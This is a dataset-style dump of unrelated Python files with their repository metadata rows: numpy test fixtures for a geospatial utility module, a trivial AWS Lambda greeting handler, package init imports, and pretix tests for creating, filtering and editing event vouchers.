[1.0, 0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
]
)
correct2 = np.array(
[
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
]
)
np.testing.assert_array_equal(mean, correct)
np.testing.assert_array_equal(mean2, correct2)
def test_half_power_radius(self):
hpr = util.half_power_radius(np.arange(0, 100000, 10000), 1.0)
res = np.array(
[
0.0,
87.266,
174.533,
261.799,
349.066,
436.332,
523.599,
610.865,
698.132,
785.398,
]
)
assert np.allclose(hpr, res)
def test_filter_window_cartesian(self):
correct = np.array(
[
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
]
)
assert np.allclose(
util.filter_window_cartesian(
self.img, 500.0, "maximum", np.array([250.0, 250])
),
correct,
)
class TestFindBboxIndices:
xarr = np.linspace(500, 1000, num=6)
yarr = np.linspace(550, 950, num=9)
gridx, gridy = np.meshgrid(xarr, yarr)
grid = np.dstack((gridx, gridy))
outside = [400, 400, 1100, 1100]
inside1 = [599, 599, 901, 901]
inside2 = [601, 601, 899, 899]
def test_find_bbox_indices(self):
bbind = util.find_bbox_indices(self.grid, self.outside)
assert np.array_equal(bbind, [0, 0, self.grid.shape[1], self.grid.shape[0]])
bbind = util.find_bbox_indices(self.grid, self.inside1)
assert np.array_equal(bbind, [0, 0, 5, 8])
bbind = util.find_bbox_indices(self.grid, self.inside2)
assert np.array_equal(bbind, [1, 1, 4, 7])
| 45.823529 | 88 | 0.441794 | 3,244 | 14,801 | 1.970407 | 0.081381 | 0.484981 | 0.673967 | 0.836671 | 0.598091 | 0.534887 | 0.504537 | 0.472153 | 0.427722 | 0.411452 | 0 | 0.272454 | 0.325991 | 14,801 | 322 | 89 | 45.965839 | 0.368284 | 0.024998 | 0 | 0.460432 | 0 | 0 | 0.011167 | 0.002913 | 0 | 0 | 0 | 0 | 0.097122 | 1 | 0.068345 | false | 0 | 0.035971 | 0 | 0.140288 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
43b1311f88ffb04ebaa22b5e0c460ddcc7b7ca51 | 177 | py | Python | Module 2 Task/Ansible-Lambda-Python/LambdaMain.py | jpeezy-undaunted/cil-internship-cohort-02 | ecdd885f61714767ef95f772258432c7bfb3a9fb | [
"MIT"
] | null | null | null | Module 2 Task/Ansible-Lambda-Python/LambdaMain.py | jpeezy-undaunted/cil-internship-cohort-02 | ecdd885f61714767ef95f772258432c7bfb3a9fb | [
"MIT"
] | null | null | null | Module 2 Task/Ansible-Lambda-Python/LambdaMain.py | jpeezy-undaunted/cil-internship-cohort-02 | ecdd885f61714767ef95f772258432c7bfb3a9fb | [
"MIT"
] | null | null | null | # -*- encoding:utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
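# Minimal AWS Lambda entry point; anything written by print() ends up in the
# function's CloudWatch log stream.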
def lambda_handler(event, context):
print("Hello Paul Welcome") | 29.5 | 82 | 0.762712 | 22 | 177 | 5.772727 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006452 | 0.124294 | 177 | 6 | 83 | 29.5 | 0.812903 | 0.124294 | 0 | 0 | 0 | 0 | 0.116883 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
603c52918fdcc30d4417398055d173d5a3f17592 | 38 | py | Python | models/unet/__init__.py | tbuikr/fastMRI | 4395380bbcddefe0bcfea76a2790e0d978009dea | [
"MIT"
] | 2 | 2019-12-09T04:57:57.000Z | 2020-02-24T18:04:12.000Z | models/unet/__init__.py | tbuikr/fastMRI | 4395380bbcddefe0bcfea76a2790e0d978009dea | [
"MIT"
] | null | null | null | models/unet/__init__.py | tbuikr/fastMRI | 4395380bbcddefe0bcfea76a2790e0d978009dea | [
"MIT"
] | null | null | null | from .unet_transpose import define_Gen | 38 | 38 | 0.894737 | 6 | 38 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 38 | 1 | 38 | 38 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
604d655dfe6753a15cc1d7368b32b44efa545046 | 98 | py | Python | finrl_meta/env_execution_optimizing/order_execution_qlib/trade/reward/__init__.py | eitin-infant/FinRL-Meta | 4c94011e58425796e7e2e5c1bf848afd65c828d6 | [
"MIT"
] | 214 | 2021-11-08T17:06:11.000Z | 2022-03-31T18:29:48.000Z | finrl_meta/env_execution_optimizing/order_execution_qlib/trade/reward/__init__.py | eitin-infant/FinRL-Meta | 4c94011e58425796e7e2e5c1bf848afd65c828d6 | [
"MIT"
] | 51 | 2021-11-14T19:11:02.000Z | 2022-03-30T20:23:08.000Z | finrl_meta/env_execution_optimizing/order_execution_qlib/trade/reward/__init__.py | eitin-infant/FinRL-Meta | 4c94011e58425796e7e2e5c1bf848afd65c828d6 | [
"MIT"
] | 110 | 2021-11-03T07:41:40.000Z | 2022-03-31T03:23:38.000Z | from .base import *
from .pa_penalty import *
from .ppo_reward import *
from .vp_penalty import *
| 19.6 | 25 | 0.755102 | 15 | 98 | 4.733333 | 0.533333 | 0.422535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163265 | 98 | 4 | 26 | 24.5 | 0.865854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6058dc71528f9a2f33a15e425191af8a7ab7925e | 211 | py | Python | facebook_events_scraper/__init__.py | munyoudoum/facebook-events-scraper | b51c6f316fcf11d56c9869895e0e4db9e2b8234d | [
"MIT"
] | 10 | 2020-10-02T21:54:07.000Z | 2021-05-01T18:06:32.000Z | facebook_events_scraper/__init__.py | munyoudoum/facebook-events-scraper | b51c6f316fcf11d56c9869895e0e4db9e2b8234d | [
"MIT"
] | 2 | 2020-12-10T21:45:41.000Z | 2020-12-21T15:18:23.000Z | facebook_events_scraper/__init__.py | munyoudoum/facebook-events-scraper | b51c6f316fcf11d56c9869895e0e4db9e2b8234d | [
"MIT"
] | 3 | 2020-10-09T08:18:55.000Z | 2021-11-10T17:28:39.000Z | from .login import login
from .driver import driver
from .scraper import event_info
from .scraper import events_recurring
from .scraper import events_upcoming
from .scraper import events
__version__ = '0.0.1b3'
| 26.375 | 37 | 0.819905 | 31 | 211 | 5.354839 | 0.419355 | 0.26506 | 0.409639 | 0.415663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0.127962 | 211 | 7 | 38 | 30.142857 | 0.880435 | 0 | 0 | 0 | 0 | 0 | 0.033175 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.857143 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
60908a1667a0ecfa5b19dda90b8655d2a5d1ee9b | 22,445 | py | Python | src/tests/control/test_vouchers.py | upsidedownpancake/pretix | bfeeb1028c9eccab4936029db7c38edd4cd5aad5 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/tests/control/test_vouchers.py | upsidedownpancake/pretix | bfeeb1028c9eccab4936029db7c38edd4cd5aad5 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/tests/control/test_vouchers.py | upsidedownpancake/pretix | bfeeb1028c9eccab4936029db7c38edd4cd5aad5 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import datetime
import json
from django.utils.timezone import now
from tests.base import SoupTest, extract_form_fields
from pretix.base.models import (
Event, Item, ItemVariation, Organizer, Quota, Team, User, Voucher,
)
class VoucherFormTest(SoupTest):
def setUp(self):
super().setUp()
self.user = User.objects.create_user('dummy@dummy.dummy', 'dummy')
self.orga = Organizer.objects.create(name='CCC', slug='ccc')
self.event = Event.objects.create(
organizer=self.orga, name='30C3', slug='30c3',
date_from=datetime.datetime(2013, 12, 26, tzinfo=datetime.timezone.utc),
)
t = Team.objects.create(organizer=self.orga, can_view_vouchers=True, can_change_vouchers=True)
t.members.add(self.user)
t.limit_events.add(self.event)
self.client.login(email='dummy@dummy.dummy', password='dummy')
self.quota_shirts = Quota.objects.create(event=self.event, name='Shirts', size=2)
self.shirt = Item.objects.create(event=self.event, name='T-Shirt', default_price=12)
self.quota_shirts.items.add(self.shirt)
self.shirt_red = ItemVariation.objects.create(item=self.shirt, default_price=14, value='Red')
self.shirt_blue = ItemVariation.objects.create(item=self.shirt, value='Blue')
self.quota_shirts.variations.add(self.shirt_red)
self.quota_shirts.variations.add(self.shirt_blue)
self.quota_tickets = Quota.objects.create(event=self.event, name='Tickets', size=5)
self.ticket = Item.objects.create(event=self.event, name='Early-bird ticket',
default_price=23)
self.quota_tickets.items.add(self.ticket)
def _create_voucher(self, data, expected_failure=False):
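# Helper: load the "add voucher" form, overlay `data` on the prefilled fields,
# submit it, then assert the expected outcome and the resulting voucher count.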
count_before = self.event.vouchers.count()
doc = self.get_doc('/control/event/%s/%s/vouchers/add' % (self.orga.slug, self.event.slug))
form_data = extract_form_fields(doc.select('.container-fluid form')[0])
form_data.update(data)
doc = self.post_doc('/control/event/%s/%s/vouchers/add' % (self.orga.slug, self.event.slug), form_data)
if expected_failure:
assert doc.select(".alert-danger, .has-error")
assert count_before == self.event.vouchers.count()
else:
assert doc.select(".alert-success")
assert count_before + 1 == self.event.vouchers.count()
def _create_bulk_vouchers(self, data, expected_failure=False):
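# Like _create_voucher, but posts the bulk-add form; on success the voucher count
# grows by the number of submitted codes.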
count_before = self.event.vouchers.count()
doc = self.get_doc('/control/event/%s/%s/vouchers/bulk_add' % (self.orga.slug, self.event.slug))
form_data = extract_form_fields(doc.select('.container-fluid form')[0])
form_data.update(data)
doc = self.post_doc('/control/event/%s/%s/vouchers/bulk_add' % (self.orga.slug, self.event.slug), form_data)
if expected_failure:
assert doc.select(".alert-danger")
assert count_before == self.event.vouchers.count()
else:
assert doc.select(".alert-success")
assert count_before + len(form_data.get('codes').split("\n")) == self.event.vouchers.count()
def _change_voucher(self, v, data, expected_failure=False):
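# Helper: edit an existing voucher through its detail form and assert whether the
# change is accepted or rejected.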
doc = self.get_doc('/control/event/%s/%s/vouchers/%s/' % (self.orga.slug, self.event.slug, v.pk))
form_data = extract_form_fields(doc.select('.container-fluid form')[0])
form_data.update(data)
doc = self.post_doc('/control/event/%s/%s/vouchers/%s/' % (self.orga.slug, self.event.slug, v.pk), form_data)
if expected_failure:
assert doc.select(".alert-danger")
else:
assert doc.select(".alert-success")
def test_list(self):
self.event.vouchers.create(item=self.ticket, code='ABCDEFG')
doc = self.client.get('/control/event/%s/%s/vouchers/' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' in doc.rendered_content
def test_csv(self):
self.event.vouchers.create(item=self.ticket, code='ABCDEFG')
doc = self.client.get('/control/event/%s/%s/vouchers/?download=yes' % (self.orga.slug, self.event.slug))
assert doc.content.strip() == '"Voucher code","Valid until","Product","Reserve quota","Bypass quota",' \
'"Price effect","Value","Tag","Redeemed","Maximum usages"\r\n"ABCDEFG","",' \
'"Early-bird ticket","No","No","No effect","","","0","1"'.encode('utf-8')
def test_filter_status_valid(self):
v = self.event.vouchers.create(item=self.ticket)
doc = self.client.get('/control/event/%s/%s/vouchers/?status=v' % (self.orga.slug, self.event.slug))
assert v.code in doc.rendered_content
v.redeemed = 1
v.save()
doc = self.client.get('/control/event/%s/%s/vouchers/?status=v' % (self.orga.slug, self.event.slug))
assert v.code not in doc.rendered_content
def test_filter_status_redeemed(self):
v = self.event.vouchers.create(item=self.ticket, redeemed=1)
doc = self.client.get('/control/event/%s/%s/vouchers/?status=r' % (self.orga.slug, self.event.slug))
assert v.code in doc.rendered_content
v.redeemed = 0
v.save()
doc = self.client.get('/control/event/%s/%s/vouchers/?status=r' % (self.orga.slug, self.event.slug))
assert v.code not in doc.rendered_content
def test_filter_status_expired(self):
v = self.event.vouchers.create(item=self.ticket, valid_until=now() + datetime.timedelta(days=1))
doc = self.client.get('/control/event/%s/%s/vouchers/?status=e' % (self.orga.slug, self.event.slug))
assert v.code not in doc.rendered_content
v.valid_until = now() - datetime.timedelta(days=1)
v.save()
doc = self.client.get('/control/event/%s/%s/vouchers/?status=e' % (self.orga.slug, self.event.slug))
assert v.code in doc.rendered_content
def test_filter_tag(self):
self.event.vouchers.create(item=self.ticket, code='ABCDEFG', comment='Foo', tag='bar')
doc = self.client.get('/control/event/%s/%s/vouchers/?tag=bar' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' in doc.rendered_content
doc = self.client.get('/control/event/%s/%s/vouchers/?tag=baz' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' not in doc.rendered_content
def test_search_code(self):
self.event.vouchers.create(item=self.ticket, code='ABCDEFG', comment='Foo')
doc = self.client.get('/control/event/%s/%s/vouchers/?search=ABCDEFG' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' in doc.rendered_content
doc = self.client.get('/control/event/%s/%s/vouchers/?search=Foo' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' in doc.rendered_content
doc = self.client.get('/control/event/%s/%s/vouchers/?search=12345' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' not in doc.rendered_content
def test_bulk_rng(self):
rng = self.client.get('/control/event/%s/%s/vouchers/rng?num=7' % (self.orga.slug, self.event.slug))
codes = json.loads(rng.content.decode('utf-8'))['codes']
assert len(codes) == 7
assert all([len(r) == 16 for r in codes])
def test_display_voucher_code(self):
count_before = self.event.vouchers.count()
doc = self.get_doc('/control/event/%s/%s/vouchers/add' % (self.orga.slug, self.event.slug))
form_data = extract_form_fields(doc.select('.container-fluid form')[0])
form_data.update({
'itemvar': '%d' % self.ticket.pk
})
doc = self.post_doc('/control/event/%s/%s/vouchers/add' % (self.orga.slug, self.event.slug), form_data)
v = Voucher.objects.latest('pk')
assert v.code in doc.select(".alert-success")[0].text
assert count_before + 1 == self.event.vouchers.count()
def test_create_voucher_for_addon_item(self):
c = self.event.categories.create(name="Foo", is_addon=True)
self.ticket.category = c
self.ticket.save()
self._create_voucher({
'itemvar': '%d' % self.ticket.pk
}, expected_failure=True)
def test_create_non_blocking_item_voucher(self):
self._create_voucher({
'itemvar': '%d' % self.ticket.pk
})
v = Voucher.objects.latest('pk')
assert not v.block_quota
assert v.item.pk == self.ticket.pk
assert v.variation is None
assert v.quota is None
def test_create_non_blocking_variation_voucher(self):
self._create_voucher({
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_red.pk)
})
v = Voucher.objects.latest('pk')
assert not v.block_quota
assert v.item.pk == self.shirt.pk
assert v.variation.pk == self.shirt_red.pk
assert v.quota is None
def test_create_non_blocking_quota_voucher(self):
self._create_voucher({
'itemvar': 'q-%d' % self.quota_tickets.pk
})
v = Voucher.objects.latest('pk')
assert not v.block_quota
assert v.item is None
assert v.variation is None
assert v.quota.pk == self.quota_tickets.pk
def test_create_blocking_item_voucher_quota_free(self):
self._create_voucher({
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on'
})
v = Voucher.objects.latest('pk')
assert v.block_quota
def test_create_blocking_item_voucher_quota_full(self):
self._create_voucher({
'itemvar': '%d' % self.shirt.pk,
'block_quota': 'on'
}, expected_failure=True)
def test_create_blocking_item_voucher_quota_full_invalid(self):
self.quota_shirts.size = 0
self.quota_shirts.save()
self._create_voucher({
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_red.pk),
'block_quota': 'on',
'valid_until_0': (now() - datetime.timedelta(days=3)).strftime('%Y-%m-%d'),
'valid_until_1': (now() - datetime.timedelta(days=3)).strftime('%H:%M:%S')
})
def test_create_blocking_variation_voucher_quota_free(self):
self._create_voucher({
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_red.pk),
'block_quota': 'on'
})
v = Voucher.objects.latest('pk')
assert v.block_quota
def test_create_short_code(self):
self._create_voucher({
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_red.pk),
'code': 'ABC'
}, expected_failure=True)
def test_create_blocking_variation_voucher_quota_full(self):
self.quota_shirts.size = 0
self.quota_shirts.save()
self._create_voucher({
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_red.pk),
'block_quota': 'on'
}, expected_failure=True)
def test_create_blocking_quota_voucher_quota_free(self):
self._create_voucher({
'itemvar': 'q-%d' % self.quota_tickets.pk,
'block_quota': 'on'
})
v = Voucher.objects.latest('pk')
assert v.block_quota
def test_create_blocking_quota_voucher_quota_full(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
self._create_voucher({
'itemvar': 'q-%d' % self.quota_tickets.pk,
'block_quota': 'on'
}, expected_failure=True)
def test_change_non_blocking_voucher(self):
v = self.event.vouchers.create(item=self.ticket)
self._change_voucher(v, {
'itemvar': 'q-%d' % self.quota_tickets.pk
})
v.refresh_from_db()
assert v.item is None
assert v.variation is None
assert v.quota.pk == self.quota_tickets.pk
def test_change_blocking_voucher_unchanged_quota_full(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
v = self.event.vouchers.create(item=self.ticket, block_quota=True)
self._change_voucher(v, {
})
v.refresh_from_db()
assert v.block_quota
def test_change_voucher_reduce_max_usages(self):
v = self.event.vouchers.create(item=self.ticket, max_usages=5, redeemed=3)
self._change_voucher(v, {
'max_usages': '2'
}, expected_failure=True)
def test_change_voucher_to_blocking_quota_full(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
v = self.event.vouchers.create(item=self.ticket)
self._change_voucher(v, {
'block_quota': 'on'
}, expected_failure=True)
def test_change_voucher_to_blocking_quota_free(self):
v = self.event.vouchers.create(item=self.ticket)
self._change_voucher(v, {
'block_quota': 'on'
})
v.refresh_from_db()
assert v.block_quota
def test_change_voucher_validity_to_valid_quota_full(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
v = self.event.vouchers.create(item=self.ticket, valid_until=now() - datetime.timedelta(days=3),
block_quota=True)
self._change_voucher(v, {
'valid_until_0': (now() + datetime.timedelta(days=3)).strftime('%Y-%m-%d'),
'valid_until_1': (now() + datetime.timedelta(days=3)).strftime('%H:%M:%S')
}, expected_failure=True)
v.refresh_from_db()
assert v.valid_until < now()
def test_change_voucher_validity_to_valid_quota_free(self):
v = self.event.vouchers.create(item=self.ticket, valid_until=now() - datetime.timedelta(days=3),
block_quota=True)
self._change_voucher(v, {
'valid_until_0': (now() + datetime.timedelta(days=3)).strftime('%Y-%m-%d'),
'valid_until_1': (now() + datetime.timedelta(days=3)).strftime('%H:%M:%S')
})
v.refresh_from_db()
assert v.valid_until > now()
def test_change_item_of_blocking_voucher_quota_free(self):
ticket2 = Item.objects.create(event=self.event, name='Late-bird ticket', default_price=23)
self.quota_tickets.items.add(ticket2)
